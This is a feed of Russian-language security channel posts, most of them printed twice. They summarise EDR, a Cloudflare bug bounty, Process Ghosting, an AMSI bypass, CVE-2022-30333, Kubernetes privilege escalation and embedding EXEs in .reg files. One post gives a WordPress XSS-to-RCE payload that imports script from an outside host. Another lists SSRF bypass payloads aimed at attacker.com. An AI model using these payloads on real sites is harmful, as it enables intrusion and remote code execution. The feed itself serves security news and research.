Open Source EDR for Windows
Endpoint Detection & Response (EDR) — класс решений для обнаружения и изучения вредоносной активности на конечных точках: подключенных к сети рабочих станциях, серверах, устройствах Интернета вещей и так далее. В отличие от антивирусов, задача которых — бороться с типовыми и массовыми угрозами, EDR-решения ориентированы на выявление целевых атак и сложных угроз. При этом EDR-решения не могут полностью заменить антивирусы (EPP), поскольку эти две технологии решают разные задачи.
Endpoint Detection & Response (EDR) — класс решений для обнаружения и изучения вредоносной активности на конечных точках: подключенных к сети рабочих станциях, серверах, устройствах Интернета вещей и так далее. В отличие от антивирусов, задача которых — бороться с типовыми и массовыми угрозами, EDR-решения ориентированы на выявление целевых атак и сложных угроз. При этом EDR-решения не могут полностью заменить антивирусы (EPP), поскольку эти две технологии решают разные задачи.
👍1
Студент нашел баг в закрытой бете Cloudflare Email Routing
Датский студент Альберт Педерсен (Albert Pedersen) смог проникнуть в закрытую бету Cloudflare Email Routing (без приглашения) и обнаружил уязвимость, которую злоумышленники могли использовать для захвата и кражи чужой электронной почты. В итоге Педерсен получил 6000 долларов от Cloudflare через программу bug bounty.
Датский студент Альберт Педерсен (Albert Pedersen) смог проникнуть в закрытую бету Cloudflare Email Routing (без приглашения) и обнаружил уязвимость, которую злоумышленники могли использовать для захвата и кражи чужой электронной почты. В итоге Педерсен получил 6000 долларов от Cloudflare через программу bug bounty.
👍1
ProcessGhosting
Это реализация на C# оригинального Process Ghosting, написанная на языке C Оригинальный POC.
Это реализация на C# оригинального Process Ghosting, написанная на языке C Оригинальный POC.
👍2
AMSI Bypass - Memory Patching
AMSI или Anti Malware Scan Interface - это защитный механизм, используемый PowerShell, UAC и многими другими для проверки того, передаются ли в него вредоносные данные или нет. В основном он нацелен на команды и сценарии, которые выполняются в PowerShell или другой интегрированной среде AMSI. Если он обнаруживает в них вредоносное содержимое, AMSI завершает выполнение и передает их в Защитник Windows для дальнейшего анализа.
AMSI или Anti Malware Scan Interface - это защитный механизм, используемый PowerShell, UAC и многими другими для проверки того, передаются ли в него вредоносные данные или нет. В основном он нацелен на команды и сценарии, которые выполняются в PowerShell или другой интегрированной среде AMSI. Если он обнаруживает в них вредоносное содержимое, AMSI завершает выполнение и передает их в Защитник Windows для дальнейшего анализа.
👍6
Взгляд с обратной стороны: как смотрит на код реверсер
Эта статья написана по мотивам выступления на C++ Russia. Я хочу рассказать, как на код C++ смотрит реверсер и что он видит в этом комбайне прекрасном языке. Обычно разработчик идет от исходного кода к двоичному, а мы — наоборот. Ко мне и коллегам приезжают sample'ы — уже скомпилированные исполняемые (PE, ELF, etc.) файлы, возможно, какой-то байткод одного из intermediate languages или даже прошивка. И мы начинаем их разбирать. Как мне кажется, реверсеры и разработчики могли бы обогатить друг друга.
Эта статья написана по мотивам выступления на C++ Russia. Я хочу рассказать, как на код C++ смотрит реверсер и что он видит в этом комбайне прекрасном языке. Обычно разработчик идет от исходного кода к двоичному, а мы — наоборот. Ко мне и коллегам приезжают sample'ы — уже скомпилированные исполняемые (PE, ELF, etc.) файлы, возможно, какой-то байткод одного из intermediate languages или даже прошивка. И мы начинаем их разбирать. Как мне кажется, реверсеры и разработчики могли бы обогатить друг друга.
👍2
CVE-2022-30333
Злоумышленник, успешно использующий эту уязвимость, может записать файл в любом месте целевой файловой системы от имени пользователя, выполняющего unrar (на Zimbra это пользователь zimbra). На Zimbra мы успешно использовали эту уязвимость для удаленного выполнения кода. Обратите внимание, что для эксплуатации уязвимости сервер не обязательно должен быть подключен к Интернету, достаточно получить вредоносное письмо.
Злоумышленник, успешно использующий эту уязвимость, может записать файл в любом месте целевой файловой системы от имени пользователя, выполняющего unrar (на Zimbra это пользователь zimbra). На Zimbra мы успешно использовали эту уязвимость для удаленного выполнения кода. Обратите внимание, что для эксплуатации уязвимости сервер не обязательно должен быть подключен к Интернету, достаточно получить вредоносное письмо.
👍1
Основные тенденции в AppSec в 2022 году
Растущее число кибератак на программное обеспечение подчеркивает, что безопасность должна быть важным фактором при разработке программного обеспечения. Помимо традиционных процедур жизненного цикла разработки программного обеспечения (SDLC), в настоящее время широко применяются жизненные циклы разработки, интегрированные в безопасность.
Растущее число кибератак на программное обеспечение подчеркивает, что безопасность должна быть важным фактором при разработке программного обеспечения. Помимо традиционных процедур жизненного цикла разработки программного обеспечения (SDLC), в настоящее время широко применяются жизненные циклы разработки, интегрированные в безопасность.
👍1
Проверяем защищённость приложения на Go: с чего начать
Проверка пользовательского ввода
Первый и один из основных этапов анализа сервиса на соответствие требованиям безопасности — проверка пользовательского ввода. Мы ищем входные данные, принимаемые приложением, и определяем те из них, которым доверять нельзя, учитывая, что клиент является внешней сущностью. Такими данными могут быть:
Проверка пользовательского ввода
Первый и один из основных этапов анализа сервиса на соответствие требованиям безопасности — проверка пользовательского ввода. Мы ищем входные данные, принимаемые приложением, и определяем те из них, которым доверять нельзя, учитывая, что клиент является внешней сущностью. Такими данными могут быть:
заголовки HTTP-запросов;
тела HTTP-запросов;
URI-запросы, отвечающие за роутинг и/или маппинг ресурсов, при условии, что такой запрос каким-либо образом обрабатывается приложением;
параметры GET и POST;
содержимое форм.
👍1
Что такое пентест: описание, виды и где найти практику
Рассмотрим, что такое тестирование на проникновение и зачем его проводят. Данный процесс позволяет определить, насколько защищены серверы и компьютерные системы компании, предприятия или более крупного объекта. Он проводится специалистами по информационной безопасности
Рассмотрим, что такое тестирование на проникновение и зачем его проводят. Данный процесс позволяет определить, насколько защищены серверы и компьютерные системы компании, предприятия или более крупного объекта. Он проводится специалистами по информационной безопасности
👍1
Криптография и будущее децентрализованных вычислений
Хотя технологии на основе блокчейна обладают многими качествами, которые отличают их от других вычислительных парадигм, их основным ценностным предложением является генерация криптографической истины. В самом простом смысле, криптографическая истина — это форма вычислений и ведения учета, которая является более точной, доступной, проверяемой и защищенной от взлома, чем существующие альтернативы.
Хотя технологии на основе блокчейна обладают многими качествами, которые отличают их от других вычислительных парадигм, их основным ценностным предложением является генерация криптографической истины. В самом простом смысле, криптографическая истина — это форма вычислений и ведения учета, которая является более точной, доступной, проверяемой и защищенной от взлома, чем существующие альтернативы.
👍1
SearchMap Information Collection Tool
Это комплексный инструмент сбора информации для предварительного тестирования на проникновение, который включает в себя разрешение доменных имен, обратный поиск IP-адресов доменных имен, запрос WHOIS, обнаружение CDN, сканирование портов, сканирование каталогов и поиск поддоменов.
Это комплексный инструмент сбора информации для предварительного тестирования на проникновение, который включает в себя разрешение доменных имен, обратный поиск IP-адресов доменных имен, запрос WHOIS, обнаружение CDN, сканирование портов, сканирование каталогов и поиск поддоменов.
👍1
Forwarded from SHADOW:Group
⚙️ Контекстный SSRF сканер
Инструмент для поиска SSRF, главными особенностями которого является фаззинг наиболее подходящих GET параметров (
Например, для URL:
Ссылка на инструмент
#web #ssrf
Инструмент для поиска SSRF, главными особенностями которого является фаззинг наиболее подходящих GET параметров (
?url=, ?uri=, и тд) и динамическая генерация полезной нагрузки в зависимости от контекста.Например, для URL:
https://host.com/?fileURL=https://authorizedhost.com, инструмент распознает хост authorizedhost.com как потенциально внесенный в белый список и динамически сгенерирует полезные нагрузки на основе этого:http://authorizedhost.attacker.comhttp://authorizedhost%252F@attacker.comи т.д.Ссылка на инструмент
#web #ssrf
👍1
Forwarded from [ Сураба 🦀]
WP 6.0 XSS to RCE PoC
It creates brute.txt file in /wp-content/plugins folder, use it instead of alert(1) in your regular XSS PoC.
import('//X55.is/wp')
Requirements:
1. Admin user logged in + default write permissions;
2. Hello Dolly plugin activated or not (WP default).
It creates brute.txt file in /wp-content/plugins folder, use it instead of alert(1) in your regular XSS PoC.
import('//X55.is/wp')
Requirements:
1. Admin user logged in + default write permissions;
2. Hello Dolly plugin activated or not (WP default).
👍1
Эскалация привилегий в Kubernetes
Когда кто-то говорит о безопасности, в первую очередь имеет ввиду авторизацию и аутентификацию, но в контексте Kubernetes эти две составляющие являются лишь маленькими кусочками большого пазла.
В этой статье вы увидите, как пользователь с ограниченными правами, может повысить свои привилегии и стать админом кластера.
Когда кто-то говорит о безопасности, в первую очередь имеет ввиду авторизацию и аутентификацию, но в контексте Kubernetes эти две составляющие являются лишь маленькими кусочками большого пазла.
В этой статье вы увидите, как пользователь с ограниченными правами, может повысить свои привилегии и стать админом кластера.
👍2🔥1
Встраиваем вирусный exe в файл *.reg
Сравнительно недавно я выпустил экспериментальный проект под названием «EmbedExeLnk» — этот инструмент генерировал файл .lnk, содержащий встроенную полезную нагрузку EXE. Я развил эту концепцию дальше и создал инструмент, который создаёт файл реестра Windows (.reg), содержащий полезную нагрузку EXE.
Сравнительно недавно я выпустил экспериментальный проект под названием «EmbedExeLnk» — этот инструмент генерировал файл .lnk, содержащий встроенную полезную нагрузку EXE. Я развил эту концепцию дальше и создал инструмент, который создаёт файл реестра Windows (.reg), содержащий полезную нагрузку EXE.
👍2
Что, если… забыть про безопасность кластера k8s?
Я думаю, многие слышали про громкий инцидент, произошедший с Tesla в 2018 году, когда группа хакеров через консоль Kubernetes смогла получить доступ к аккаунту. После получения доступа ребята изрядно повеселились, настроив майнер в облачном сервисе Amazon Web Services.
Я думаю, многие слышали про громкий инцидент, произошедший с Tesla в 2018 году, когда группа хакеров через консоль Kubernetes смогла получить доступ к аккаунту. После получения доступа ребята изрядно повеселились, настроив майнер в облачном сервисе Amazon Web Services.
👍1